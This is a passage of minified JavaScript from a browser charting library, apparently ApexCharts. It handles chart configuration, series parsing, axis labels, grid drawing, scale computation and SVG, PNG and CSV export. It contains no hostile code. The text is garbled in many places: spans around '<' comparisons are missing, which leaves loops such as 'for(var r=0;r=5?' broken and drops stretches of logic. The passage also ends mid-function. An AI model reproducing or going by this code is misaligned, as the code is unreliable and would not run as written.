0!==e.annotations.points?e.annotations.points:[],a.pointAnnotation),e}},{key:"checkForDarkTheme",value:function(e){e.theme&&"dark"===e.theme.mode&&(e.tooltip||(e.tooltip={}),"light"!==e.tooltip.theme&&(e.tooltip.theme="dark"),e.chart.foreColor||(e.chart.foreColor="#f6f7f8"),e.chart.background||(e.chart.background="#424242"),e.theme.palette||(e.theme.palette="palette4"))}},{key:"handleUserInputErrors",value:function(e){var a=e;if(a.tooltip.shared&&a.tooltip.intersect)throw new Error("tooltip.shared cannot be enabled when tooltip.intersect is true. Turn off any other option by setting it to false.");if("bar"===a.chart.type&&a.plotOptions.bar.horizontal){if(a.yaxis.length>1)throw new Error("Multiple Y Axis for bars are not supported. Switch to column chart by setting plotOptions.bar.horizontal=false");a.yaxis[0].reversed&&(a.yaxis[0].opposite=!0),a.xaxis.tooltip.enabled=!1,a.yaxis[0].tooltip.enabled=!1,a.chart.zoom.enabled=!1}return"bar"!==a.chart.type&&"rangeBar"!==a.chart.type||a.tooltip.shared&&"barWidth"===a.xaxis.crosshairs.width&&a.series.length>1&&(a.xaxis.crosshairs.width="tickWidth"),"candlestick"!==a.chart.type&&"boxPlot"!==a.chart.type||a.yaxis[0].reversed&&(console.warn("Reversed y-axis in ".concat(a.chart.type," chart is not supported.")),a.yaxis[0].reversed=!1),a}}]),e}(),G=function(){function e(){s(this,e)}return u(e,[{key:"initGlobalVars",value:function(e){e.series=[],e.seriesCandleO=[],e.seriesCandleH=[],e.seriesCandleM=[],e.seriesCandleL=[],e.seriesCandleC=[],e.seriesRangeStart=[],e.seriesRangeEnd=[],e.seriesRangeBar=[],e.seriesPercent=[],e.seriesGoals=[],e.seriesX=[],e.seriesZ=[],e.seriesNames=[],e.seriesTotals=[],e.seriesLog=[],e.seriesColors=[],e.stackedSeriesTotals=[],e.seriesXvalues=[],e.seriesYvalues=[],e.labels=[],e.hasGroups=!1,e.groups=[],e.categoryLabels=[],e.timescaleLabels=[],e.noLabelsProvided=!1,e.resizeTimer=null,e.selectionResizeTimer=null,e.delayedElements=[],e.pointsArray=[],e.dataLabelsRects=[],e.isXNumeric=!1,e.xaxisLabelsCount=0,e.skipLastTimelinelabel=!1,e.skipFirstTimelinelabel=!1,e.isDataXYZ=!1,e.isMultiLineX=!1,e.isMultipleYAxis=!1,e.maxY=-Number.MAX_VALUE,e.minY=Number.MIN_VALUE,e.minYArr=[],e.maxYArr=[],e.maxX=-Number.MAX_VALUE,e.minX=Number.MAX_VALUE,e.initialMaxX=-Number.MAX_VALUE,e.initialMinX=Number.MAX_VALUE,e.maxDate=0,e.minDate=Number.MAX_VALUE,e.minZ=Number.MAX_VALUE,e.maxZ=-Number.MAX_VALUE,e.minXDiff=Number.MAX_VALUE,e.yAxisScale=[],e.xAxisScale=null,e.xAxisTicksPositions=[],e.yLabelsCoords=[],e.yTitleCoords=[],e.barPadForNumericAxis=0,e.padHorizontal=0,e.xRange=0,e.yRange=[],e.zRange=0,e.dataPoints=0,e.xTickAmount=0}},{key:"globalVars",value:function(e){return{chartID:null,cuid:null,events:{beforeMount:[],mounted:[],updated:[],clicked:[],selection:[],dataPointSelection:[],zoomed:[],scrolled:[]},colors:[],clientX:null,clientY:null,fill:{colors:[]},stroke:{colors:[]},dataLabels:{style:{colors:[]}},radarPolygons:{fill:{colors:[]}},markers:{colors:[],size:e.markers.size,largestSize:0},animationEnded:!1,isTouchDevice:"ontouchstart"in window||navigator.msMaxTouchPoints,isDirty:!1,isExecCalled:!1,initialConfig:null,initialSeries:[],lastXAxis:[],lastYAxis:[],columnSeries:null,labels:[],timescaleLabels:[],noLabelsProvided:!1,allSeriesCollapsed:!1,collapsedSeries:[],collapsedSeriesIndices:[],ancillaryCollapsedSeries:[],ancillaryCollapsedSeriesIndices:[],risingSeries:[],dataFormatXNumeric:!1,capturedSeriesIndex:-1,capturedDataPointIndex:-1,selectedDataPoints:[],goldenPadding:35,invalidLogScale:!1,ignoreYAxisIndexes:[],yAxisSameScaleIndices:[],maxValsInArrayIndex:0,radialSize:0,selection:void 0,zoomEnabled:"zoom"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.zoom&&e.chart.zoom.enabled,panEnabled:"pan"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.pan,selectionEnabled:"selection"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.selection,yaxis:null,mousedown:!1,lastClientPosition:{},visibleXRange:void 0,yValueDecimal:0,total:0,SVGNS:"http://www.w3.org/2000/svg",svgWidth:0,svgHeight:0,noData:!1,locale:{},dom:{},memory:{methodsToExec:[]},shouldAnimate:!0,skipLastTimelinelabel:!1,skipFirstTimelinelabel:!1,delayedElements:[],axisCharts:!0,isDataXYZ:!1,resized:!1,resizeTimer:null,comboCharts:!1,dataChanged:!1,previousPaths:[],allSeriesHasEqualX:!0,pointsArray:[],dataLabelsRects:[],lastDrawnDataLabelsIndexes:[],hasNullValues:!1,easing:null,zoomed:!1,gridWidth:0,gridHeight:0,rotateXLabels:!1,defaultLabels:!1,xLabelFormatter:void 0,yLabelFormatters:[],xaxisTooltipFormatter:void 0,ttKeyFormatter:void 0,ttVal:void 0,ttZFormatter:void 0,LINE_HEIGHT_RATIO:1.618,xAxisLabelsHeight:0,xAxisGroupLabelsHeight:0,xAxisLabelsWidth:0,yAxisLabelsWidth:0,scaleX:1,scaleY:1,translateX:0,translateY:0,translateYAxisX:[],yAxisWidths:[],translateXAxisY:0,translateXAxisX:0,tooltip:null}}},{key:"init",value:function(e){var a=this.globalVars(e);return this.initGlobalVars(a),a.initialConfig=k.extend({},e),a.initialSeries=k.clone(e.series),a.lastXAxis=k.clone(a.initialConfig.xaxis),a.lastYAxis=k.clone(a.initialConfig.yaxis),a}}]),e}(),I=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"init",value:function(){var e=new F(this.opts).init({responsiveOverride:!1});return{config:e,globals:(new G).init(e)}}}]),e}(),Z=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.twoDSeries=[],this.threeDSeries=[],this.twoDSeriesX=[],this.seriesGoals=[],this.coreUtils=new A(this.ctx)}return u(e,[{key:"isMultiFormat",value:function(){return this.isFormatXY()||this.isFormat2DArray()}},{key:"isFormatXY",value:function(){var e=this.w.config.series.slice(),a=new K(this.ctx);if(this.activeSeriesIndex=a.getActiveConfigSeriesIndex(),void 0!==e[this.activeSeriesIndex].data&&e[this.activeSeriesIndex].data.length>0&&null!==e[this.activeSeriesIndex].data[0]&&void 0!==e[this.activeSeriesIndex].data[0].x&&null!==e[this.activeSeriesIndex].data[0])return!0}},{key:"isFormat2DArray",value:function(){var e=this.w.config.series.slice(),a=new K(this.ctx);if(this.activeSeriesIndex=a.getActiveConfigSeriesIndex(),void 0!==e[this.activeSeriesIndex].data&&e[this.activeSeriesIndex].data.length>0&&void 0!==e[this.activeSeriesIndex].data[0]&&null!==e[this.activeSeriesIndex].data[0]&&e[this.activeSeriesIndex].data[0].constructor===Array)return!0}},{key:"handleFormat2DArray",value:function(e,a){for(var n=this.w.config,i=this.w.globals,t="boxPlot"===n.chart.type||"boxPlot"===n.series[a].type,r=0;r=5?this.twoDSeries.push(k.parseNumber(e[a].data[r][4])):this.twoDSeries.push(k.parseNumber(e[a].data[r][1])),i.dataFormatXNumeric=!0),"datetime"===n.xaxis.type){var o=new Date(e[a].data[r][0]);o=new Date(o).getTime(),this.twoDSeriesX.push(o)}else this.twoDSeriesX.push(e[a].data[r][0]);for(var s=0;s-1&&(r=this.activeSeriesIndex);for(var o=0;o1&&void 0!==arguments[1]?arguments[1]:this.ctx,i=this.w.config,t=this.w.globals,r=new H(n),o=i.labels.length>0?i.labels.slice():i.xaxis.categories.slice();t.isRangeBar="rangeBar"===i.chart.type&&t.isBarHorizontal,t.hasGroups="category"===i.xaxis.type&&void 0!==i.xaxis.group&&void 0!==i.xaxis.group.groups&&i.xaxis.group.groups.length>0,t.hasGroups&&(t.groups=i.xaxis.group.groups);for(var s=function(){for(var e=0;e0&&(this.twoDSeriesX=o,t.seriesX.push(this.twoDSeriesX))),t.labels.push(this.twoDSeriesX);var u=e[l].data.map((function(e){return k.parseNumber(e)}));t.series.push(u)}t.seriesZ.push(this.threeDSeries),void 0!==e[l].name?t.seriesNames.push(e[l].name):t.seriesNames.push("series-"+parseInt(l+1,10)),void 0!==e[l].color?t.seriesColors.push(e[l].color):t.seriesColors.push(void 0)}return this.w}},{key:"parseDataNonAxisCharts",value:function(e){var a=this.w.globals,n=this.w.config;a.series=e.slice(),a.seriesNames=n.labels.slice();for(var i=0;i0?n.labels=a.xaxis.categories:a.labels.length>0?n.labels=a.labels.slice():this.fallbackToCategory?(n.labels=n.labels[0],n.seriesRangeBar.length&&(n.seriesRangeBar.map((function(e){e.forEach((function(e){n.labels.indexOf(e.x)<0&&e.x&&n.labels.push(e.x)}))})),n.labels=n.labels.filter((function(e,a,n){return n.indexOf(e)===a}))),a.xaxis.convertedCatToNumeric&&(new V(a).convertCatToNumericXaxis(a,this.ctx,n.seriesX[0]),this._generateExternalLabels(e))):this._generateExternalLabels(e)}},{key:"_generateExternalLabels",value:function(e){var a=this.w.globals,n=this.w.config,i=[];if(a.axisCharts){if(a.series.length>0)if(this.isFormatXY())for(var t=n.series.map((function(e,a){return e.data.filter((function(e,a,n){return n.findIndex((function(a){return a.x===e.x}))===a}))})),r=t.reduce((function(e,a,n,i){return i[e].length>a.length?e:n}),0),o=0;o0&&n<100?e.toFixed(1):e.toFixed(0)}return a.globals.isBarHorizontal&&a.globals.maxY-a.globals.minYArr<4?e.toFixed(1):e.toFixed(0)}return e},"function"==typeof a.config.tooltip.x.formatter?a.globals.ttKeyFormatter=a.config.tooltip.x.formatter:a.globals.ttKeyFormatter=a.globals.xLabelFormatter,"function"==typeof a.config.xaxis.tooltip.formatter&&(a.globals.xaxisTooltipFormatter=a.config.xaxis.tooltip.formatter),(Array.isArray(a.config.tooltip.y)||void 0!==a.config.tooltip.y.formatter)&&(a.globals.ttVal=a.config.tooltip.y),void 0!==a.config.tooltip.z.formatter&&(a.globals.ttZFormatter=a.config.tooltip.z.formatter),void 0!==a.config.legend.formatter&&(a.globals.legendFormatter=a.config.legend.formatter),a.config.yaxis.forEach((function(n,i){void 0!==n.labels.formatter?a.globals.yLabelFormatters[i]=n.labels.formatter:a.globals.yLabelFormatters[i]=function(t){return a.globals.xyCharts?Array.isArray(t)?t.map((function(a){return e.defaultYFormatter(a,n,i)})):e.defaultYFormatter(t,n,i):t}})),a.globals}},{key:"heatmapLabelFormatters",value:function(){var e=this.w;if("heatmap"===e.config.chart.type){e.globals.yAxisScale[0].result=e.globals.seriesNames.slice();var a=e.globals.seriesNames.reduce((function(e,a){return e.length>a.length?e:a}),0);e.globals.yAxisScale[0].niceMax=a,e.globals.yAxisScale[0].niceMin=a}}}]),e}(),W=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"getLabel",value:function(e,a,n,i){var t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:[],r=arguments.length>5&&void 0!==arguments[5]?arguments[5]:"12px",o=!(arguments.length>6&&void 0!==arguments[6])||arguments[6],s=this.w,l=void 0===e[i]?"":e[i],u=l,c=s.globals.xLabelFormatter,d=s.config.xaxis.labels.formatter,h=!1,p=new J(this.ctx),m=l;o&&(u=p.xLabelFormat(c,l,m,{i:i,dateFormatter:new H(this.ctx).formatDate,w:s}),void 0!==d&&(u=d(l,e[i],{i:i,dateFormatter:new H(this.ctx).formatDate,w:s})));var f=function(e){var n=null;return a.forEach((function(e){"month"===e.unit?n="year":"day"===e.unit?n="month":"hour"===e.unit?n="day":"minute"===e.unit&&(n="hour")})),n===e};a.length>0?(h=f(a[i].unit),n=a[i].position,u=a[i].value):"datetime"===s.config.xaxis.type&&void 0===d&&(u=""),void 0===u&&(u=""),u=Array.isArray(u)?u:u.toString();var v=new S(this.ctx),g={};g=s.globals.rotateXLabels&&o?v.getTextRects(u,parseInt(r,10),null,"rotate(".concat(s.config.xaxis.labels.rotate," 0 0)"),!1):v.getTextRects(u,parseInt(r,10));var b=!s.config.xaxis.labels.showDuplicates&&this.ctx.timeScale;return!Array.isArray(u)&&(0===u.indexOf("NaN")||0===u.toLowerCase().indexOf("invalid")||u.toLowerCase().indexOf("infinity")>=0||t.indexOf(u)>=0&&b)&&(u=""),{x:n,text:u,textRect:g,isBold:h}}},{key:"checkLabelBasedOnTickamount",value:function(e,a,n){var i=this.w,t=i.config.xaxis.tickAmount;return"dataPoints"===t&&(t=Math.round(i.globals.gridWidth/120)),t>n||e%Math.round(n/(t+1))==0||(a.text=""),a}},{key:"checkForOverflowingLabels",value:function(e,a,n,i,t){var r=this.w;if(0===e&&r.globals.skipFirstTimelinelabel&&(a.text=""),e===n-1&&r.globals.skipLastTimelinelabel&&(a.text=""),r.config.xaxis.labels.hideOverlappingLabels&&i.length>0){var o=t[t.length-1];a.x0){!0===s.config.yaxis[t].opposite&&(e+=i.width);for(var c=a;c>=0;c--){var d=u+a/10+s.config.yaxis[t].labels.offsetY-1;s.globals.isBarHorizontal&&(d=r*c),"heatmap"===s.config.chart.type&&(d+=r/2);var h=l.drawLine(e+n.offsetX-i.width+i.offsetX,d+i.offsetY,e+n.offsetX+i.offsetX,d+i.offsetY,i.color);o.add(h),u+=r}}}}]),e}(),U=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"scaleSvgNode",value:function(e,a){var n=parseFloat(e.getAttributeNS(null,"width")),i=parseFloat(e.getAttributeNS(null,"height"));e.setAttributeNS(null,"width",n*a),e.setAttributeNS(null,"height",i*a),e.setAttributeNS(null,"viewBox","0 0 "+n+" "+i)}},{key:"fixSvgStringForIe11",value:function(e){if(!k.isIE11())return e.replace(/ /g," ");var a=0,n=e.replace(/xmlns="http:\/\/www.w3.org\/2000\/svg"/g,(function(e){return 2===++a?'xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:svgjs="http://svgjs.dev"':e}));return(n=n.replace(/xmlns:NS\d+=""/g,"")).replace(/NS\d+:(\w+:\w+=")/g,"$1")}},{key:"getSvgString",value:function(e){var a=this.w.globals.dom.Paper.svg();if(1!==e){var n=this.w.globals.dom.Paper.node.cloneNode(!0);this.scaleSvgNode(n,e),a=(new XMLSerializer).serializeToString(n)}return this.fixSvgStringForIe11(a)}},{key:"cleanup",value:function(){var e=this.w,a=e.globals.dom.baseEl.getElementsByClassName("apexcharts-xcrosshairs"),n=e.globals.dom.baseEl.getElementsByClassName("apexcharts-ycrosshairs"),i=e.globals.dom.baseEl.querySelectorAll(".apexcharts-zoom-rect, .apexcharts-selection-rect");Array.prototype.forEach.call(i,(function(e){e.setAttribute("width",0)})),a&&a[0]&&(a[0].setAttribute("x",-500),a[0].setAttribute("x1",-500),a[0].setAttribute("x2",-500)),n&&n[0]&&(n[0].setAttribute("y",-100),n[0].setAttribute("y1",-100),n[0].setAttribute("y2",-100))}},{key:"svgUrl",value:function(){this.cleanup();var e=this.getSvgString(),a=new Blob([e],{type:"image/svg+xml;charset=utf-8"});return URL.createObjectURL(a)}},{key:"dataURI",value:function(e){var a=this;return new Promise((function(n){var i=a.w,t=e?e.scale||e.width/i.globals.svgWidth:1;a.cleanup();var r=document.createElement("canvas");r.width=i.globals.svgWidth*t,r.height=parseInt(i.globals.dom.elWrap.style.height,10)*t;var o="transparent"===i.config.chart.background?"#fff":i.config.chart.background,s=r.getContext("2d");s.fillStyle=o,s.fillRect(0,0,r.width*t,r.height*t);var l=a.getSvgString(t);if(window.canvg&&k.isIE11()){var u=window.canvg.Canvg.fromString(s,l,{ignoreClear:!0,ignoreDimensions:!0});u.start();var c=r.msToBlob();u.stop(),n({blob:c})}else{var d="data:image/svg+xml,"+encodeURIComponent(l),h=new Image;h.crossOrigin="anonymous",h.onload=function(){if(s.drawImage(h,0,0),r.msToBlob){var e=r.msToBlob();n({blob:e})}else{var a=r.toDataURL("image/png");n({imgURI:a})}},h.src=d}}))}},{key:"exportToSVG",value:function(){this.triggerDownload(this.svgUrl(),this.w.config.chart.toolbar.export.svg.filename,".svg")}},{key:"exportToPng",value:function(){var e=this;this.dataURI().then((function(a){var n=a.imgURI,i=a.blob;i?navigator.msSaveOrOpenBlob(i,e.w.globals.chartID+".png"):e.triggerDownload(n,e.w.config.chart.toolbar.export.png.filename,".png")}))}},{key:"exportToCSV",value:function(e){var a=this,n=e.series,i=e.columnDelimiter,t=e.lineDelimiter,r=void 0===t?"\n":t,o=this.w,s=[],l=[],u="",c=new Z(this.ctx),d=new W(this.ctx),h=function(e){var n="";if(o.globals.axisCharts){if("category"===o.config.xaxis.type||o.config.xaxis.convertedCatToNumeric)if(o.globals.isBarHorizontal){var t=o.globals.yLabelFormatters[0],r=new K(a.ctx).getActiveConfigSeriesIndex();n=t(o.globals.labels[e],{seriesIndex:r,dataPointIndex:e,w:o})}else n=d.getLabel(o.globals.labels,o.globals.timescaleLabels,0,e).text;"datetime"===o.config.xaxis.type&&(o.config.xaxis.categories.length?n=o.config.xaxis.categories[e]:o.config.labels.length&&(n=o.config.labels[e]))}else n=o.config.labels[e];return Array.isArray(n)&&(n=n.join(" ")),k.isNumber(n)?n:n.split(i).join("")};s.push(o.config.chart.toolbar.export.csv.headerCategory),n.map((function(e,a){var n=e.name?e.name:"series-".concat(a);o.globals.axisCharts&&s.push(n.split(i).join("")?n.split(i).join(""):"series-".concat(a))})),o.globals.axisCharts||(s.push(o.config.chart.toolbar.export.csv.headerValue),l.push(s.join(i))),n.map((function(e,a){o.globals.axisCharts?function(e,a){if(s.length&&0===a&&l.push(s.join(i)),e.data&&e.data.length)for(var t=0;t=10?o.config.chart.toolbar.export.csv.dateFormatter(r):k.isNumber(r)?r:r.split(i).join("")));for(var u=0;u0&&!n.globals.isBarHorizontal&&(this.xaxisLabels=n.globals.timescaleLabels.slice()),n.config.xaxis.overwriteCategories&&(this.xaxisLabels=n.config.xaxis.overwriteCategories),this.drawnLabels=[],this.drawnLabelsRects=[],"top"===n.config.xaxis.position?this.offY=0:this.offY=n.globals.gridHeight+1,this.offY=this.offY+n.config.xaxis.axisBorder.offsetY,this.isCategoryBarHorizontal="bar"===n.config.chart.type&&n.config.plotOptions.bar.horizontal,this.xaxisFontSize=n.config.xaxis.labels.style.fontSize,this.xaxisFontFamily=n.config.xaxis.labels.style.fontFamily,this.xaxisForeColors=n.config.xaxis.labels.style.colors,this.xaxisBorderWidth=n.config.xaxis.axisBorder.width,this.isCategoryBarHorizontal&&(this.xaxisBorderWidth=n.config.yaxis[0].axisBorder.width.toString()),this.xaxisBorderWidth.indexOf("%")>-1?this.xaxisBorderWidth=n.globals.gridWidth*parseInt(this.xaxisBorderWidth,10)/100:this.xaxisBorderWidth=parseInt(this.xaxisBorderWidth,10),this.xaxisBorderHeight=n.config.xaxis.axisBorder.height,this.yaxis=n.config.yaxis[0]}return u(e,[{key:"drawXaxis",value:function(){var e=this.w,a=new S(this.ctx),n=a.group({class:"apexcharts-xaxis",transform:"translate(".concat(e.config.xaxis.offsetX,", ").concat(e.config.xaxis.offsetY,")")}),i=a.group({class:"apexcharts-xaxis-texts-g",transform:"translate(".concat(e.globals.translateXAxisX,", ").concat(e.globals.translateXAxisY,")")});n.add(i);for(var t=[],r=0;r6&&void 0!==arguments[6]?arguments[6]:{},u=[],c=[],d=this.w,h=l.xaxisFontSize||this.xaxisFontSize,p=l.xaxisFontFamily||this.xaxisFontFamily,m=l.xaxisForeColors||this.xaxisForeColors,f=l.fontWeight||d.config.xaxis.labels.style.fontWeight,v=l.cssClass||d.config.xaxis.labels.style.cssClass,g=d.globals.padHorizontal,b=i.length,k="category"===d.config.xaxis.type?d.globals.dataPoints:b;if(t){var y=k>1?k-1:k;o=d.globals.gridWidth/y,g=g+r(0,o)/2+d.config.xaxis.labels.offsetX}else o=d.globals.gridWidth/k,g=g+r(0,o)+d.config.xaxis.labels.offsetX;for(var x=function(t){var l=g-r(t,o)/2+d.config.xaxis.labels.offsetX;0===t&&1===b&&o/2===g&&1===k&&(l=d.globals.gridWidth/2);var y=s.axesUtils.getLabel(i,d.globals.timescaleLabels,l,t,u,h,e),x=28;if(d.globals.rotateXLabels&&e&&(x=22),e||(x=x+parseFloat(h)+(d.globals.xAxisLabelsHeight-d.globals.xAxisGroupLabelsHeight)+(d.globals.rotateXLabels?10:0)),y=void 0!==d.config.xaxis.tickAmount&&"dataPoints"!==d.config.xaxis.tickAmount&&"datetime"!==d.config.xaxis.type?s.axesUtils.checkLabelBasedOnTickamount(t,y,b):s.axesUtils.checkForOverflowingLabels(t,y,b,u,c),e&&y.text&&d.globals.xaxisLabelsCount++,d.config.xaxis.labels.show){var S=a.drawText({x:y.x,y:s.offY+d.config.xaxis.labels.offsetY+x-("top"===d.config.xaxis.position?d.globals.xAxisHeight+d.config.xaxis.axisTicks.height-2:0),text:y.text,textAnchor:"middle",fontWeight:y.isBold?600:f,fontSize:h,fontFamily:p,foreColor:Array.isArray(m)?e&&d.config.xaxis.convertedCatToNumeric?m[d.globals.minX+t-1]:m[t]:m,isPlainText:!1,cssClass:(e?"apexcharts-xaxis-label ":"apexcharts-xaxis-group-label ")+v});if(n.add(S),e){var A=document.createElementNS(d.globals.SVGNS,"title");A.textContent=Array.isArray(y.text)?y.text.join(" "):y.text,S.node.appendChild(A),""!==y.text&&(u.push(y.text),c.push(y))}}ti.globals.gridWidth)){var r=this.offY+i.config.xaxis.axisTicks.offsetY;if(a=a+r+i.config.xaxis.axisTicks.height,"top"===i.config.xaxis.position&&(a=r-i.config.xaxis.axisTicks.height),i.config.xaxis.axisTicks.show){var o=new S(this.ctx).drawLine(e+i.config.xaxis.axisTicks.offsetX,r+i.config.xaxis.offsetY,t+i.config.xaxis.axisTicks.offsetX,a+i.config.xaxis.offsetY,i.config.xaxis.axisTicks.color);n.add(o),o.node.classList.add("apexcharts-xaxis-tick")}}}},{key:"getXAxisTicksPositions",value:function(){var e=this.w,a=[],n=this.xaxisLabels.length,i=e.globals.padHorizontal;if(e.globals.timescaleLabels.length>0)for(var t=0;t0){var u=t[t.length-1].getBBox(),c=t[0].getBBox();u.x<-20&&t[t.length-1].parentNode.removeChild(t[t.length-1]),c.x+c.width>e.globals.gridWidth&&!e.globals.isBarHorizontal&&t[0].parentNode.removeChild(t[0]);for(var d=0;d0&&(this.xaxisLabels=n.globals.timescaleLabels.slice())}return u(e,[{key:"drawGridArea",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null,a=this.w,n=new S(this.ctx);null===e&&(e=n.group({class:"apexcharts-grid"}));var i=n.drawLine(a.globals.padHorizontal,1,a.globals.padHorizontal,a.globals.gridHeight,"transparent"),t=n.drawLine(a.globals.padHorizontal,a.globals.gridHeight,a.globals.gridWidth,a.globals.gridHeight,"transparent");return e.add(t),e.add(i),e}},{key:"drawGrid",value:function(){var e=null;return this.w.globals.axisCharts&&(e=this.renderGrid(),this.drawGridArea(e.el)),e}},{key:"createGridMask",value:function(){var e=this.w,a=e.globals,n=new S(this.ctx),i=Array.isArray(e.config.stroke.width)?0:e.config.stroke.width;if(Array.isArray(e.config.stroke.width)){var t=0;e.config.stroke.width.forEach((function(e){t=Math.max(t,e)})),i=t}a.dom.elGridRectMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elGridRectMask.setAttribute("id","gridRectMask".concat(a.cuid)),a.dom.elGridRectMarkerMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elGridRectMarkerMask.setAttribute("id","gridRectMarkerMask".concat(a.cuid)),a.dom.elForecastMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elForecastMask.setAttribute("id","forecastMask".concat(a.cuid)),a.dom.elNonForecastMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elNonForecastMask.setAttribute("id","nonForecastMask".concat(a.cuid));var r=e.config.chart.type,o=0,s=0;("bar"===r||"rangeBar"===r||"candlestick"===r||"boxPlot"===r||e.globals.comboBarCount>0)&&e.globals.isXNumeric&&!e.globals.isBarHorizontal&&(o=e.config.grid.padding.left,s=e.config.grid.padding.right,a.barPadForNumericAxis>o&&(o=a.barPadForNumericAxis,s=a.barPadForNumericAxis)),a.dom.elGridRect=n.drawRect(-i/2-o-2,-i/2,a.gridWidth+i+s+o+4,a.gridHeight+i,0,"#fff");var l=e.globals.markers.largestSize+1;a.dom.elGridRectMarker=n.drawRect(2*-l,2*-l,a.gridWidth+4*l,a.gridHeight+4*l,0,"#fff"),a.dom.elGridRectMask.appendChild(a.dom.elGridRect.node),a.dom.elGridRectMarkerMask.appendChild(a.dom.elGridRectMarker.node);var u=a.dom.baseEl.querySelector("defs");u.appendChild(a.dom.elGridRectMask),u.appendChild(a.dom.elForecastMask),u.appendChild(a.dom.elNonForecastMask),u.appendChild(a.dom.elGridRectMarkerMask)}},{key:"_drawGridLines",value:function(e){var a=e.i,n=e.x1,i=e.y1,t=e.x2,r=e.y2,o=e.xCount,s=e.parent,l=this.w;if(!(0===a&&l.globals.skipFirstTimelinelabel||a===o-1&&l.globals.skipLastTimelinelabel&&!l.config.xaxis.labels.formatter||"radar"===l.config.chart.type)){l.config.grid.xaxis.lines.show&&this._drawGridLine({x1:n,y1:i,x2:t,y2:r,parent:s});var u=0;if(l.globals.hasGroups&&(void 0===l.config.xaxis.tickAmount||"dataPoints"===l.config.xaxis.tickAmount)&&"between"===l.config.xaxis.tickPlacement){var c=l.globals.groups;if(c){for(var d=0,h=0;d2));t++);return!e.globals.isBarHorizontal||this.isRangeBar?(n=this.xaxisLabels.length,this.isRangeBar&&(i=e.globals.labels.length,e.config.xaxis.tickAmount&&e.config.xaxis.labels.formatter&&(n=e.config.xaxis.tickAmount)),this._drawXYLines({xCount:n,tickAmount:i})):(n=i,i=e.globals.xTickAmount,this._drawInvertedXYLines({xCount:n,tickAmount:i})),this.drawGridBands(n,i),{el:this.elg,xAxisTickWidth:e.globals.gridWidth/n}}},{key:"drawGridBands",value:function(e,a){var n=this.w;if(void 0!==n.config.grid.row.colors&&n.config.grid.row.colors.length>0)for(var i=0,t=n.globals.gridHeight/a,r=n.globals.gridWidth,o=0,s=0;o=n.config.grid.row.colors.length&&(s=0),this._drawGridBandRect({c:s,x1:0,y1:i,x2:r,y2:t,type:"row"}),i+=n.globals.gridHeight/a;if(void 0!==n.config.grid.column.colors&&n.config.grid.column.colors.length>0)for(var l=n.globals.isBarHorizontal||"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric?e:e-1,u=n.globals.padHorizontal,c=n.globals.padHorizontal+n.globals.gridWidth/l,d=n.globals.gridHeight,h=0,p=0;h=n.config.grid.column.colors.length&&(p=0),this._drawGridBandRect({c:p,x1:u,y1:0,x2:c,y2:d,type:"column"}),u+=n.globals.gridWidth/l}}]),e}(),X=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"niceScale",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:10,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:0,t=arguments.length>4?arguments[4]:void 0,r=this.w,o=Math.abs(a-e);if("dataPoints"===(n=this._adjustTicksForSmallRange(n,i,o))&&(n=r.globals.dataPoints-1),e===Number.MIN_VALUE&&0===a||!k.isNumber(e)&&!k.isNumber(a)||e===Number.MIN_VALUE&&a===-Number.MAX_VALUE){e=0,a=n;var s=this.linearScale(e,a,n);return s}e>a?(console.warn("axis.min cannot be greater than axis.max"),a=e+.1):e===a&&(e=0===e?0:e-.5,a=0===a?2:a+.5);var l=[];o<1&&t&&("candlestick"===r.config.chart.type||"candlestick"===r.config.series[i].type||"boxPlot"===r.config.chart.type||"boxPlot"===r.config.series[i].type||r.globals.isRangeData)&&(a*=1.01);var u=n+1;u<2?u=2:u>2&&(u-=2);var c=o/u,d=Math.floor(k.log10(c)),h=Math.pow(10,d),p=Math.round(c/h);p<1&&(p=1);var m=p*h,f=m*Math.floor(e/m),v=m*Math.ceil(a/m),g=f;if(t&&o>2){for(;l.push(g),!((g+=m)>v););return{result:l,niceMin:l[0],niceMax:l[l.length-1]}}var b=e;(l=[]).push(b);for(var y=Math.abs(a-e)/n,x=0;x<=n;x++)b+=y,l.push(b);return l[l.length-2]>=a&&l.pop(),{result:l,niceMin:l[0],niceMax:l[l.length-1]}}},{key:"linearScale",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:10,i=arguments.length>3?arguments[3]:void 0,t=Math.abs(a-e);"dataPoints"===(n=this._adjustTicksForSmallRange(n,i,t))&&(n=this.w.globals.dataPoints-1);var r=t/n;n===Number.MAX_VALUE&&(n=10,r=1);for(var o=[],s=e;n>=0;)o.push(s),s+=r,n-=1;return{result:o,niceMin:o[0],niceMax:o[o.length-1]}}},{key:"logarithmicScale",value:function(e,a,n){for(var i=[],t=Math.ceil(Math.log(a)/Math.log(n))+1,r=0;r5)i.allSeriesCollapsed=!1,i.yAxisScale[e]=this.logarithmicScale(a,n,r.logBase);else if(n!==-Number.MAX_VALUE&&k.isNumber(n))if(i.allSeriesCollapsed=!1,void 0===r.min&&void 0===r.max||r.forceNiceScale){var s=void 0===t.yaxis[e].max&&void 0===t.yaxis[e].min||t.yaxis[e].forceNiceScale;i.yAxisScale[e]=this.niceScale(a,n,r.tickAmount?r.tickAmount:o<5&&o>1?o+1:5,e,s)}else i.yAxisScale[e]=this.linearScale(a,n,r.tickAmount,e);else i.yAxisScale[e]=this.linearScale(0,5,5)}},{key:"setXScale",value:function(e,a){var n=this.w,i=n.globals,t=n.config.xaxis,r=Math.abs(a-e);return 